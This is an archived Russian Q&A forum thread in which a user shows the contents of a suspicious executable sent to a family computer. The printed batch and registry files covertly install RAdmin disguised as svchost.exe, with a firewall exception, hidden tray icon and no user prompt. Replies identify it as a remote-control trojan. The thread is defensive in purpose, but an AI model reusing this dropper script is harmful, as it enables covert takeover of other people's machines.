Вопросы и ответы
Топ за год Облако тегов  

Что эта програма делает

компьютеры

ZASOR, 273 просмотра
1
На второй комп пока там сидела сестра прислали програмку danc.exe, она её запустила, но у меня она вызвала подозрение, я её распаковал, там были следующие файлы:

111.bat
111.reg
AdmDll.dll
psix.flv
raddrv.dll
svchost.exe

В bat-файле было написано:
@echo off
start psix.swf
netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "winwest" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/help\svchost.exe" /install /silence
"%SYSTEMROOT%/help\svchost.exe" /start

В .reg файле:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:d9,fe,12,63,b1,3b,3a,e6,4e,9e,a1,51,1f,e0,97,21
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

Примечание:
Да, я понял когда вчитался. Убил процесс и удалил всё что он накопировал. Всем спасибо.
Ответы:
Без имени
Видимо, ставит RAdmin - программу для управления компьютером по сети.
Gris
Устанавливает в систему скрытый процесс RAdmin под видом системного процесса svchost.exe. Очевидно, с целью дальнейшего удаленного управления компьютером.


15 лет назад

RPI.su - самая большая русскоязычная база вопросов и ответов. Наш проект был реализован как продолжение популярного сервиса otvety.google.ru, который был закрыт и удален 30 апреля 2015 года. Мы решили воскресить полезный сервис Ответы Гугл, чтобы любой человек смог публично узнать ответ на свой вопрос у интернет сообщества.

Все вопросы, добавленные на сайт ответов Google, мы скопировали и сохранили здесь. Имена старых пользователей также отображены в том виде, в котором они существовали ранее. Только нужно заново пройти регистрацию, чтобы иметь возможность задавать вопросы, или отвечать другим.

Чтобы связаться с нами по любому вопросу О САЙТЕ (реклама, сотрудничество, отзыв о сервисе), пишите на почту [email protected]. Только все общие вопросы размещайте на сайте, на них ответ по почте не предоставляется.